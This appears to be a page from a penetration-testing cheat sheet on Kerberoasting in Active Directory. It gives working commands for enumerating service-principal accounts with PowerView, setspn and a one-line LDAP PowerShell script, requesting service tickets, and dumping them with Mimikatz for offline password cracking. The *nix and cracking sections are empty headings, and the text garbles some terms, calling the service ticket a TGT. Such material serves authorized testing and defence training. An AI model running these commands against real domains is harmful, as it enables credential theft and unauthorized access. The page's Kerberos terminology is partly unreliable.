search

Kerberoast

Send a request to a TGT for a Kerberos token, dump it from memory, crack it locally to obtain access to the target. The TGT can also be used to forge a Silver Ticket and gain access to the service machine. Vulnerable accounts need to have the flag serverPrincipalName set.

hashtag
Exploit

hashtag
Windows machine

Vulnerable machines in domain

Get-NetUser -SPN | select serviceprincipalname    //Powerview
setspn -T <domain> -Q */*                         //Builtin

Enumerate with LDAP Powershell module

$ldapFilter="(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))";$domain=New-Object System.DirectoryServices.DirectoryEntry;$search=New-Object System.DirectoryServices.DirectorySearcher;$search.SearchRoot=$domain;$search.PageSize=1000;$search.Filter=$ldapFilter;$search.SearchScope="Subtree";$results=$search.FindAll()$Results=foreach($result in $results){$result_entry=$result.GetDirectoryEntry();$result_entry|Select-Object @{Name="Username";Expression={$_.sAMAccountName}},@{Name="SPN";Expression={$_.servicePrincipalName|Select-Object -First 1}}}$Results;

Enumerate past remote sessions on local machine

klist

Request a Service Ticket from the target. The ticket will be stored in memory

Add-Type -AssemblyName System.IdentityModel;New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"

Dump the SPN ticket using Mimikatz

privilege::debug
token::elevate
kerberos::list /export

hashtag
*nix machine

Get a list of SPN users. Requires a valid user and password or NTLM hash to query the DC

Dump TGT

hashtag
Crack hash

Crack the .kirbi file or hash received from impacket

PreviousPass The HashNextASREProast

Last updated